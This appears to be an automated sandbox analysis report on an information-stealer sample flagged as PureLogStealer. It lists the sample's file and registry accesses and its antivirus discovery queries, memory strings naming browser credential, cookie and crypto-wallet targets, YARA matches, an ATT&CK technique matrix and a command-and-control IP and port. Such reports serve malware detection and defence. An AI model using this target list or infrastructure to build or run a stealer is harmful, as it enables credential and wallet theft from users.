                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.340e790.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.4fa0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumL"
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.340e790.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.4fa0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        311
                        Process Injection
                        11
                        Masquerading
                        1
                        OS Credential Dumping
                        221
                        Security Software Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        LSASS Memory1
                        Process Discovery
                        Remote Desktop Protocol3
                        Data from Local System
                        11
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                        Virtualization/Sandbox Evasion
                        Security Account Manager241
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture12
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets113
                        System Information Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                        Obfuscated Files or Information
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        MfzXU6tKOq.exe68%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                        MfzXU6tKOq.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://185.222.58.82:556150%Avira URL Cloudsafe
                        http://185.222.58.82:50%Avira URL Cloudsafe
                        185.222.58.82:556150%Avira URL Cloudsafe
                        http://www.sakkal.comne0%Avira URL Cloudsafe
                        http://185.222.58.82:55615t-kq0%Avira URL Cloudsafe
                        http://185.222.58.82:55615/0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ip.sb
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://185.222.58.82:55615/true
                          • Avira URL Cloud: safe
                          unknown
                          185.222.58.82:55615true
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabtmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                            high
                            http://www.fontbureau.com/designersGMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                high
                                http://www.fontbureau.com/designers/?MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/DataSet1.xsdMfzXU6tKOq.exefalse
                                            high
                                            https://api.ip.sb/geoipRegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.tiro.comMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                      high
                                                      http://www.fontbureau.com/designersMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sakkal.comneMfzXU6tKOq.exe, 00000000.00000002.1841237299.0000000004EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.goodfont.co.krMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://185.222.58.82:5RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sajatypeworks.comMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 00000003.00000002.1992867983.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.typography.netDMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cTheMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
